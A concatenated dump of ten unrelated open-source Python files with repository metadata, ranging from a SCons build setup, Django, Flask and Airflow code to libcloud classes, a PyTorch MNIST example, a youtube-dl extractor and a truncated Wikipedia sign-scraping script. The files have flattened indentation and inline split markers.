ATNF/askapsdp | Tools/scons_tools/askapenv.py | Python | gpl-2.0 | 4,699 | 0.005746 | # Copyright (c) 2009 CSIRO
# Australia Telescope National Facility (ATNF)
# Commonwealth Scientific and Industrial Research Organisation (CSIRO)
# PO Box 76, Epping NSW 1710, Australia
# atnf-enquiries@csiro.au
#
# This file is part of the ASKAP software distribution.
#
# The ASKAP software distribution is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the License,
# or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os
from SCons.Environment import Environment
from SCons.Variables import Variables, BoolVariable
from SCons.Script import ARGUMENTS
# Returns true if the environment has "modules" support
def has_environment_modules():
return os.environ.has_key("MODULESHOME")
# Does the platform have MPI capability that can be used explicitly
# by using the mpicc * mpicxx compiler wrappers?
def has_explicit_mpi(env):
return env.Detect("mpicc") and env.Detect("mpicxx")
# Some platforms have MPI support which must be explicitly setup.
# That is the mpicc/mpicxx compiler wrappers need to be used explicitly
# Others, such as the Cray environment have MPI support already wrapped
# in the CC & CXX commands
def has_implicit_mpi():
return os.environ.has_key("CRAYOS_VERSION")
# This is always needed as it defines the ASKAP scons environment
askaptoolpath = os.path.join(os.environ['ASKAP_ROOT'], 'share', 'scons_tools')
# The build environment.
env = Environment(ENV = { 'PATH' : os.environ[ 'PATH' ],
'HOME' : os.environ[ 'HOME' ] },
toolpath = [askaptoolpath],
| tools = ['default', 'askap_package', 'doxybuilder',
'functestbuilder', 'icebuilder', 'cloptions' ]
)
# Importing TERM allows programs (such as clang) to produce colour output
# if the terminal supports it
if | 'TERM' in os.environ:
env['ENV']['TERM'] = os.environ['TERM']
opts = Variables('sconsopts.cfg', ARGUMENTS)
opts.Add(BoolVariable("nompi", "Disable MPI", False))
opts.Add(BoolVariable("openmp", "Use OpenMP", False))
opts.Add(BoolVariable("update", "svn update?", False))
opts.Update(env)
# Standard compiler flags
env.AppendUnique(CCFLAGS=['-Wall'])
env.AppendUnique(CCFLAGS=['-O2'])
env.AppendUnique(CCFLAGS=['-g'])
env.AppendUnique(CCFLAGS=['-DASKAP_DEBUG'])
# If the system has environment modules support we need to import
# the whole environment
if has_environment_modules():
env["ENV"] = os.environ
# Support setting of "RBUILD_NOMPI" in the environment, because forgetting
# to pass nompi=1 on the command line is a common error
if os.environ.has_key('RBUILD_NOMPI') and os.environ['RBUILD_NOMPI'] == '1':
print "info: RBUILD_NOMPI=1 found in env, building without MPI support"
env['nompi'] = 1
# Setup MPI support
if has_implicit_mpi():
if env['nompi']:
print "error: Cannot disable MPI on this platform"
env.Exit(1)
env.AppendUnique(CPPFLAGS=['-DHAVE_MPI'])
if not env['nompi'] and not has_implicit_mpi():
if has_explicit_mpi(env):
env["CC"] = "mpicc"
env["CXX"] = "mpicxx"
env["LINK"] = "mpicxx"
env["SHLINK"] = "mpicxx"
env.AppendUnique(CPPFLAGS=['-DHAVE_MPI'])
else:
print "warn: No MPI support detected, compiling without"
# Setu OpenMP support
if env['openmp']:
env.AppendUnique(CCFLAGS=['-fopenmp'])
env.AppendUnique(LINKFLAGS=['-fopenmp'])
# Overwrite for Cray, need to use the standard compiler wrappers
# By default gcc/g++ are used
if os.environ.has_key("CRAYOS_VERSION"):
env["ENV"] = os.environ
env["CC"] = "cc"
env["CXX"] = "CC"
env["LINK"] = "CC"
env["SHLINK"] = "CC"
env.AppendUnique(LINKFLAGS=['-dynamic'])
# use global environment definitions
ASKAP_ROOT = os.getenv('ASKAP_ROOT')
envfiles = ['%s/env.default' % ASKAP_ROOT,]
for e in envfiles:
if os.path.exists(e):
print("askapenv: processing environment file: %s" % e)
opts = []
for line in open(e, "r"):
line = line.strip()
if line and not line.startswith("#"):
(k, v) = line.split('=')
env[k] = v
|
andrewebdev/django-ostinato | ostinato/tests/statemachine/models.py | Python | mit | 509 | 0.001965 | from djang | o.db import models
from .workflow import TestStateMachine
class TestModel(models.Model):
name = models.CharField(max_length=100)
state = models.CharField(max_length=20, null=True, blank=True)
state_num = models.IntegerField(null=True, blank=True)
other_state = models.CharField(max_length=20, null=True, blank=True)
message = models.CharField | (max_length=250, null=True, blank=True)
class Meta:
permissions = TestStateMachine.get_permissions('testmodel', 'Test')
|
simonjpartridge/byeBias | main.py | Python | apache-2.0 | 644 | 0.003106 | from flask import Flask
app = Flask(__name__)
app.config['DEBUG'] = True
f | rom scraper import default
from scraper import articleProcess
# Note: We don't need to call run() since our application is embedded within
# the App Engine WSGI application server.
|
@app.route('/')
def hello():
"""Return a friendly HTTP greeting."""
return 'Hello World!'
@app.route('/processArticle')
def lala():
return articleProcess.processArticle()
@app.route('/defa')
def fghrghfh():
return default.return_yo()
@app.errorhandler(404)
def page_not_found(e):
"""Return a custom 404 error."""
return 'Sorry, nothing at this URL.', 404
|
ema/conpaas | conpaas-services/contrib/libcloud/compute/base.py | Python | bsd-3-clause | 33,322 | 0 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Provides base classes for working with drivers
"""
import sys
import time
import hashlib
import os
import socket
import struct
import binascii
from libcloud.utils.py3 import b
import libcloud.compute.ssh
from libcloud.pricing import get_size_price
from libcloud.compute.types import NodeState, DeploymentError
from libcloud.compute.ssh import SSHClient
# @@TR: are the imports below part of the public api for this
# module? They aren't used in here ...
from libcloud.common.base import ConnectionKey, ConnectionUserAndKey
from libcloud.common.base import BaseDriver
from libcloud.httplib_ssl import LibcloudHTTPSConnection
from libcloud.common.base import LibcloudHTTPConnection
from libcloud.common.types import LibcloudError
# How long to wait for the node to come online after creating it
NODE_ONLINE_WAIT_TIMEOUT = 10 * 60
# How long to try connecting to a remote SSH server when running a deployment
# script.
SSH_CONNECT_TIMEOUT = 5 * 60
__all__ = [
"Node",
"NodeState",
"NodeSize",
"NodeImage",
"NodeLocation",
"NodeAuthSSHKey",
"NodeAuthPassword",
"NodeDriver",
# @@TR: do the following need exporting?
"ConnectionKey",
"ConnectionUserAndKey",
"LibcloudHTTPSConnection",
"LibcloudHTTPConnection"
]
class UuidMixin(object):
"""
Mixin class for get_uuid function.
"""
def __init__(self):
self._uuid = None
def get_uuid(self):
"""Unique hash for a node, node image, or node size
@return: C{string}
The hash is a function of an SHA1 hash of the node, node image,
or node size's ID and its driver which means that it should be
unique between all objects of its type.
In some subclasses (e.g. GoGridNode) there is no ID
available so the public IP address is used. This means that,
unlike a properly done system UUID, the same UUID may mean a
different system install at a different time
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> node = driver.create_node()
>>> node.get_uuid()
'd3748461511d8b9b0e0bfa0d4d3383a619a2bb9f'
Note, for example, that this example will always produce the
same UUID!
"""
if not self._uuid:
self._uuid = hashlib.sha1(b('%s:%s' %
(self.id, self.driver.type))).hexdigest()
return self._uuid
@property
def uuid(self):
return self.get_uuid()
class Node(UuidMixin):
"""
Provide a common interface for handling nodes of all types.
The Node object provides the interface in libcloud through which
we can manipulate nodes in different cloud providers in the same
way. Node objects don't actually do much directly themselves,
instead the node driver handles the connection to the node.
You don't normally create a node object yourself; instead you use
a driver and then have that create the node for you.
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> node = driver.create_node()
>>> node.public_ips[0]
'127.0.0.3'
>>> node.name
'dummy-3'
You can also get nodes from the driver's list_node function.
>>> node = driver.list_nodes()[0]
>>> node.name
'dummy-1'
the node keeps a reference to its own driver which means that we
can work on nodes from different providers without having to know
which is which.
>>> driver = DummyNodeDriver(72)
>>> node2 = driver.create_node()
>>> node.driver.creds
0
>>> node2.driver.creds
72
Althrough Node objects can be subclassed, this isn't normally
done. Instead, any driver specific information is stored in the
"extra" proproperty of the node.
>>> node.extra
{'foo': 'bar'}
"""
def __init__(self, id, name, state, public_ips, private_ips,
driver, size=None, image=None, extra=None):
self.id = str(id) if id else None
self.name = name
self.state = state
self.public_ips = public_ips if public_ips else []
self.private_ips = private_ips if private_ips else []
self.driver = driver
self.size = size
self.image = image
self.extra = extra or {}
UuidMixin.__init__(self)
# Note: getters and setters bellow are here only for backward
# compatibility. They will be removed in the next release.
def _set_public_ips(self, value):
self.public_ips = value
def _get_public_ips(self):
return self.public_ips
def _set_private_ips(self, value):
self.private_ips = value
def _get_private_ips(self):
return self.private_ips
public_ip = property(fget=_get_public_ips, fset=_set_public_ips)
private_ip = property(fget=_get_private_ips, fset=_set_private_ips)
def reboot(self):
"""Reboot this node
@return: C{bool}
This calls the node's driver and reboots the node
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> node = driver.create_node()
>>> from libcloud.compute.types import NodeState
>>> node.state == NodeState.RUNNING
True
>>> node.state == NodeState.REBOOTING
False
>>> node.reboot()
True
>>> node.state == NodeState.REBOOTING
True
"""
return self.driver.reboot_node(self)
def destroy(self):
"""Destroy this node
@return: C{bool}
This calls the node's driver and destroys the node
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> from libcloud.compute.types import NodeState
>>> node = driver.create_node()
>>> node.state == NodeState.RUNNING
True
>>> node.destroy()
True
>>> node.state == NodeState.RUNNING
False
| """
return self.driver.des | troy_node(self)
def __repr__(self):
return (('<Node: uuid=%s, name=%s, state=%s, public_ips=%s, '
'provider=%s ...>')
% (self.uuid, self.name, self.state, self.public_ips,
self.driver.name))
class NodeSize(UuidMixin):
"""
A Base NodeSize class to derive from.
NodeSizes are objects which are typically returned a driver's
list_sizes function. They contain a number of different
parameters which define how big an image is.
The exact parameters available depends on the provider.
N.B. Where a parameter is "unlimited" (for example bandwidth in
Amazon) this will be given as 0.
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> size = driver.list_sizes()[0]
>>> size.ram
128
>>> size.bandwidth
500
>>> size.price
4
"""
def __init__(self, id, name, ram, disk, bandwidth, price, driver):
self.id = str(id)
self.name = name
self.ram = ram
self.disk = disk
self.bandwidth = bandwidth
self.price = price
self.driver = driver
UuidMixin.__init__(self)
def __repr__(self):
return (('<NodeSize: id=%s, name=%s, ram=%s disk=% |
Fokko/incubator-airflow | airflow/sensors/sql_sensor.py | Python | apache-2.0 | 4,819 | 0.003528 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Iterable
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class SqlSensor(BaseSensorOperator):
"""
Runs a sql statement repeatedly until a criteria is met. It will keep trying until
success or failure criteria are met, or if the first cell is not in (0, '0', '', None).
Optional success and failure callables are called with the first cell returned as the argument.
If success callable is defined the sensor will keep retrying until the criteria is met.
If failure callable is defined and the criteria is met the sensor will raise AirflowException.
Failure criteria is evaluated before success criteria. A fail_on_empty boolean can also
be passed to the sensor in which case it will fail if no rows have been returned
:param conn_id: The connection to run the sensor against
:type conn_id: str
:param sql: The sql to run. To pass, it needs to return at least one cell
that contains a non-zero / empty string value.
:type sql: str
:param parameters: The parameters to render the SQL query with (optional).
:type parameters: mapping or iterable
:param success: Success criteria for the sensor is a Callable that takes first_cell
as the only argument, and returns a boolean (optional).
:type: success: Optional<Callable[[Any], bool]>
:param failure: Failure criteria for the sensor is a Callable | that takes first_cell
as the only argument and return a boolean (optional).
:type: failure: Optional<Callable[[Any], bool] | >
:param fail_on_empty: Explicitly fail on no rows returned.
:type: fail_on_empty: bool
"""
template_fields = ('sql',) # type: Iterable[str]
template_ext = ('.hql', '.sql',) # type: Iterable[str]
ui_color = '#7c7287'
@apply_defaults
def __init__(self, conn_id, sql, parameters=None, success=None, failure=None, fail_on_empty=False,
*args, **kwargs):
self.conn_id = conn_id
self.sql = sql
self.parameters = parameters
self.success = success
self.failure = failure
self.fail_on_empty = fail_on_empty
super().__init__(*args, **kwargs)
def _get_hook(self):
conn = BaseHook.get_connection(self.conn_id)
allowed_conn_type = {'google_cloud_platform', 'jdbc', 'mssql',
'mysql', 'oracle', 'postgres',
'presto', 'sqlite', 'vertica'}
if conn.conn_type not in allowed_conn_type:
raise AirflowException("The connection type is not supported by SqlSensor. " +
"Supported connection types: {}".format(list(allowed_conn_type)))
return conn.get_hook()
def poke(self, context):
hook = self._get_hook()
self.log.info('Poking: %s (with parameters %s)', self.sql, self.parameters)
records = hook.get_records(self.sql, self.parameters)
if not records:
if self.fail_on_empty:
raise AirflowException("No rows returned, raising as per fail_on_empty flag")
else:
return False
first_cell = records[0][0]
if self.failure is not None:
if callable(self.failure):
if self.failure(first_cell):
raise AirflowException(
"Failure criteria met. self.failure({}) returned True".format(first_cell))
else:
raise AirflowException("self.failure is present, but not callable -> {}".format(self.success))
if self.success is not None:
if callable(self.success):
return self.success(first_cell)
else:
raise AirflowException("self.success is present, but not callable -> {}".format(self.success))
return bool(first_cell)
|
Lucasfeelix/ong-joao-de-barro | users/migrations/0001_initial.py | Python | mit | 2,597 | 0.004667 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-06-21 04:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Donors',
field | s=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),
('modified_at', models.DateTimeField(auto_now=True, verbose_name='Modi | ficado em')),
('address', models.CharField(blank=True, max_length=100, verbose_name='Endereço')),
('number', models.IntegerField(verbose_name='Número')),
('complement', models.CharField(blank=True, max_length=100, verbose_name='Complemento')),
('neighborhood', models.CharField(blank=True, max_length=100, verbose_name='Bairro')),
('city', models.CharField(blank=True, max_length=100, verbose_name='Cidade')),
('state', models.CharField(blank=True, choices=[('Acre', 'Acre'), ('Alagoas', 'Alagoas'), ('Amazonas', 'Amazonas'), ('Amapá', 'Amapá'), ('Bahia', 'Bahia'), ('Ceará', 'Ceará'), ('Brasília', 'Brasília'), ('Espírito Santo', 'Espírito Santo'), ('Goiás', 'Goiás'), ('Maranhão', 'Maranhão'), ('Minas Gerais', 'Minas Gerais'), ('Mato Grosso do Sul', 'Mato Grosso do Sul'), ('Mato Grosso', 'Mato Grosso'), ('Pará', 'Pará'), ('Paraíba', 'Paraíba'), ('Pernambuco', 'Pernambuco'), ('Piauí', 'Piauí'), ('Paraná', 'Paraná'), ('Rio de Janeiro', 'Rio de Janeiro'), ('Rio Grande do Norte', 'Rio Grande do Norte'), ('Rondônia', 'Rondônia'), ('Roraima', 'Roraima'), ('Rio Grande do Sul', 'Rio Grande do Sul'), ('Santa Catarina', 'Santa Catarina'), ('Sergipe', 'Sergipe'), ('São Paulo', 'São Paulo'), ('Tocantins', 'Tocantins')], max_length=16, verbose_name='Estado')),
('cep', models.CharField(blank=True, max_length=8, verbose_name='CEP')),
('name', models.CharField(blank=True, max_length=100, verbose_name='Nome')),
('slug', models.SlugField(default='', max_length=100, verbose_name='Identificador')),
('is_active', models.BooleanField(default=True, verbose_name='Ativo')),
],
options={
'verbose_name': 'Doador',
'verbose_name_plural': 'Doadores',
'ordering': ['name'],
},
),
]
|
chuckbasstan123/pyTorch_project | mnist/main.py | Python | bsd-3-clause | 4,528 | 0.001767 | from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='enables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}
train_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=args.batch_size, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=args.batch_size, shuffle=True, **kwargs)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, 320)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = F.relu(self.fc2(x))
return F.log_softmax(x)
model = Net()
if args.cuda:
model.cuda()
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)
def train(epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
if args.cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, t | arget)
| loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.data[0]))
def test(epoch):
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
if args.cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data, volatile=True), Variable(target)
output = model(data)
test_loss += F.nll_loss(output, target).data[0]
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum()
test_loss = test_loss
test_loss /= len(test_loader) # loss function already averages over batch size
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
for epoch in range(1, args.epochs + 1):
train(epoch)
test(epoch)
|
h3llrais3r/Auto-Subliminal | autosubliminal/providers/proxy.py | Python | gpl-3.0 | 1,013 | 0.000987 | from urllib.parse import urlparse
class Proxy(object):
def __init__(self, proxy_type, proxy_address, proxy_port, proxy_login, proxy_password):
self.proxyType = proxy_type
self.proxyAddress = proxy_address
self.proxyPort = proxy_port
self.proxyLogin = proxy_login
self.proxyPassword = proxy_password
def serialize(self):
result = {' | proxyType': self.proxyType,
'proxyAddress': self.proxyAddress,
'proxyPort': self.proxyPort}
if self.proxyLogin or self.proxyPassword:
result['proxyLogin'] = self.proxyLogin
result['proxyPassword'] = self.proxyPassword
| return result
@classmethod
def parse_url(cls, url):
parsed = urlparse(url)
return cls(proxy_type=parsed.scheme,
proxy_address=parsed.hostname,
proxy_port=parsed.port,
proxy_login=parsed.username,
proxy_password=parsed.password)
|
svagionitis/youtube-dl | youtube_dl/extractor/comedycentral.py | Python | unlicense | 9,941 | 0.003018 | from __future__ import unicode_literals
import re
from .mtv import MTVServicesInfoExtractor
from ..utils import (
compat_str,
compat_urllib_parse,
ExtractorError,
float_or_none,
unified_strdate,
)
class ComedyCentralIE(MTVServicesInfoExtractor):
_VALID_URL = r'''(?x)https?://(?:www\.)?cc\.com/
(video-clips|episodes|cc-studios|video-collections|full-episodes)
/(?P<title>.*)'''
_FEED_URL = 'http://comedycentral.com/feeds/mrss/'
_TEST = {
'url': 'http://www.cc.com/video-clips/kllhuv/stand-up-greg-fitzsimmons--uncensored---too-good-of-a-mother',
'md5': 'c4f48e9eda1b16dd10add0744344b6d8',
'info_dict': {
'id': 'cef0cbb3-e776-4bc9-b62e-8016deccb354',
'ext': 'mp4',
'title': 'CC:Stand-Up|Greg Fitzsimmons: Life on Stage|Uncensored - Too Good of a Mother',
'description': 'After a certain point, breastfeeding becomes c**kblocking.',
},
}
class ComedyCentralShowsIE(MTVServicesInfoExtractor):
IE_DESC = 'The Daily Show / The Colbert Report'
# urls can be abbreviations like :thedailyshow or :colbert
# urls for episodes like:
# or urls for clips like: http://www.thedailyshow.com/watch/mon-december-10-2012/any-given-gun-day
# or: http://www.colbertnation.com/the-colbert-report-videos/421667/november-29-2012/moon-shattering-news
# or: http://www.colbertnation.com/the-colbert-report-collections/422008/festival-of-lights/79524
_VALID_URL = r'''(?x)^(:(?P<shortname>tds|thedailyshow|cr|colbert|colbertnation|colbertreport)
|https?://(:www\.)?
(?P<showname>thedailyshow|thecolbertreport)\.(?:cc\.)?com/
((?:full-)?episodes/(?:[0-9a-z]{6}/)?(?P<episode>.*)|
(?P<clip>
(?:(?:guests/[^/]+|videos|video-playlists|special-editions|news-team/[^/]+)/[^/]+/(?P<videotitle>[^/?#]+))
|(the-colbert-report-(videos|collections)/(?P<clipID>[0-9]+)/[^/]*/(?P<cntitle>.*?))
|(watch/(?P<date>[^/]*)/(?P<tdstitle>.*))
)|
(?P<interview>
extended-interviews/(?P<interID>[0-9a-z]+)/(?:playlist_tds_extended_)?(?P<interview_title>.*?)(/.*?)?)))
(?:[?#].*|$)'''
_TESTS = [{
'url': 'http://thedailyshow.cc.com/watch/thu-december-13-2012/kristen-stewart',
'md5': '4e2f5cb088a83cd8cdb7756132f9739d',
'info_dict': {
'id': 'ab9ab3e7-5a98-4dbe-8b21-551dc0523d55',
'ext': 'mp4',
'upload_date': '20121213',
'description': 'Kristen Stewart learns to let loose in "On the Road."',
'uploader': 'thedailyshow',
'title': 'thedailyshow kristen-stewart part 1',
}
}, {
'url': 'http://thedailyshow.cc.com/extended-interviews/xm3fnq/andrew-napolitano-extended-interview',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/videos/29w6fx/-realhumanpraise-for-fox-news',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/videos/gh6urb/neil-degrasse-tyson-pt--1?xrs=eml_col_031114',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/guests/michael-lewis/3efna8/exclusive---michael-lewis-extended-interview-pt--3',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/episodes/sy7yv0/april-8--2014---denis-leary',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/episodes/8ase07/april-8--2014---jane-goodall',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/video-playlists/npde3s/the-daily-show-19088-highlights',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/special-editions/2l8fdb/special-edition---a-look-back-at-food',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/news-team/michael-che/7wnfel/we-need-to-talk-about-israel',
'only_matching': True,
}]
_available_formats = ['3500', '2200', '1700', '1200', '750', '400']
_video_extensions = {
'3500': 'mp4',
'2200': 'mp4',
'1700': 'mp4',
'1200': 'mp4',
'750': 'mp4',
'400': 'mp4',
}
_video_dimensions = {
'3500': (1280, 720),
'2200': (960, 540),
'1700': (768, 432),
'1200': (640, 360),
'750': (512, 288),
'400': (384, 216),
}
def _real_extra | ct(self, url):
mobj = re.match(self._VALID_URL, url)
if mobj.group('shortname'):
if mobj.group('shortname') in ('tds', 'thedailyshow'):
url = 'http://thedailyshow.cc.com/full-episodes/'
else:
url = 'http://thecolbertreport.cc.com/full-epi | sodes/'
mobj = re.match(self._VALID_URL, url, re.VERBOSE)
assert mobj is not None
if mobj.group('clip'):
if mobj.group('videotitle'):
epTitle = mobj.group('videotitle')
elif mobj.group('showname') == 'thedailyshow':
epTitle = mobj.group('tdstitle')
else:
epTitle = mobj.group('cntitle')
dlNewest = False
elif mobj.group('interview'):
epTitle = mobj.group('interview_title')
dlNewest = False
else:
dlNewest = not mobj.group('episode')
if dlNewest:
epTitle = mobj.group('showname')
else:
epTitle = mobj.group('episode')
show_name = mobj.group('showname')
webpage, htmlHandle = self._download_webpage_handle(url, epTitle)
if dlNewest:
url = htmlHandle.geturl()
mobj = re.match(self._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid redirected URL: ' + url)
if mobj.group('episode') == '':
raise ExtractorError('Redirected URL is still not specific: ' + url)
epTitle = (mobj.group('episode') or mobj.group('videotitle')).rpartition('/')[-1]
mMovieParams = re.findall('(?:<param name="movie" value="|var url = ")(http://media.mtvnservices.com/([^"]*(?:episode|video).*?:.*?))"', webpage)
if len(mMovieParams) == 0:
# The Colbert Report embeds the information in a without
# a URL prefix; so extract the alternate reference
# and then add the URL prefix manually.
altMovieParams = re.findall('data-mgid="([^"]*(?:episode|video|playlist).*?:.*?)"', webpage)
if len(altMovieParams) == 0:
raise ExtractorError('unable to find Flash URL in webpage ' + url)
else:
mMovieParams = [("http://media.mtvnservices.com/" + altMovieParams[0], altMovieParams[0])]
uri = mMovieParams[0][1]
# Correct cc.com in uri
uri = re.sub(r'(episode:[^.]+)(\.cc)?\.com', r'\1.cc.com', uri)
index_url = 'http://%s.cc.com/feeds/mrss?%s' % (show_name, compat_urllib_parse.urlencode({'uri': uri}))
idoc = self._download_xml(
index_url, epTitle,
'Downloading show index', 'Unable to download episode index')
title = idoc.find('./channel/title').text
description = idoc.find('./channel/description').text
entries = []
item_els = idoc.findall('.//item')
for part_num, itemEl in enumerate(item_els):
upload_date = unified_strdate(itemEl.findall('./pubDate')[0].text)
thumbnail = itemEl.find('.//{http://search.yahoo.com/mrss/}thumbnail').attrib.get('url')
content = itemEl.find('.//{http://search.yahoo.com/mrss/}content')
duration = float_or_none(content.attrib.get('duration'))
mediagen_url = content.attrib['url']
guid = itemEl.find('./guid').text.rpartition(':')[-1]
cdoc = self._download_xml(
mediagen_url |
radicalbiscuit/mutcd-getter | mutcd-getter.py | Python | mit | 5,919 | 0.003886 | #!/usr/bin/env python
"""Get MUTCD SVGs from Wikipedia."""
import urllib
import argparse
import os
import json
from lxml import html
import wikipedia
from pyquery import PyQuery
class MUTCDGetterError(Exception):
pass
# Setup arguments.
parser = argparse.ArgumentParser()
parser.add_argument('--title', default='Comparison of MUTCD-Influenced Traffic Signs',
help='The title of the Wikipedia entry containing the tables of MUTCD-inspired signs.')
parser.add_argument('--tables', default='Warning,Regulatory,Mandatory or permitted actions,Other (indication)',
help='The headers of the tables whose signs you wish to retrieve.')
parser.add_argument('--column', default='USA',
help='The identifier representing the column you wish to pull from each table (e.g. 5, or "USA").')
parser.add_argument('--output_folder', default=os.getcwd(),
help='The path to the folder into which the signage and common names file should be downloaded.')
parser.add_argument('--common_names_filename', default='mutcd_common_names.json',
help='The filename for the JSON-formatted file mapping common sign names to SVG file names.')
parsed_args = parser.parse_args()
# Get the requested article.
print('Fetching the wikipedia page...')
wiki_page = wikipedia.page(parsed_args.title)
# Parse the html and wrap it in pyquery.
d = PyQuery(html.fromstring(wiki_page.html()))
# Get a list of all headers in the document, to be filtered later for each table's header.
all_headers = d(':header')
# Create a data structure to store sign data and filenames.
signs = []
raw_filename_map = {}
print('Finding the SVGs. Hang tight. This may take a couple of minutes.\n')
# For each table header, get the associated table.
table_headers = parsed_args.tables.split(',')
for table_header in table_headers:
table_signs = {
'type': 'category',
'text': table_header,
'data': []
}
table = PyQuery(all_headers.filter(lambda: this.text_content() == table_header + '[edit]').next_all('table')[0])
first_row = table('tr:nth-chi | ld(1)')
column = parsed_args.column
if isinstance(column, str):
# If the provided column is a string, find the column index. While this is probably the same for each table,
# we'll still check every time. | It's cheap and this is an infrequent script.
for i, header_cell in enumerate(first_row.find('th')):
if header_cell.text_content().strip().startswith(column):
column = i
break
if isinstance(column, str):
# We couldn't find it.
raise MUTCDGetterError('The specified column header could not be found.')
# Get all rows following the first row.
table_rows = first_row.next_all('tr')
for row in table_rows:
row = PyQuery(row)
# Due to a current pyquery bug, nth-child does not work right.
row_header = PyQuery(row.find('td')[0]).text()
if not row_header:
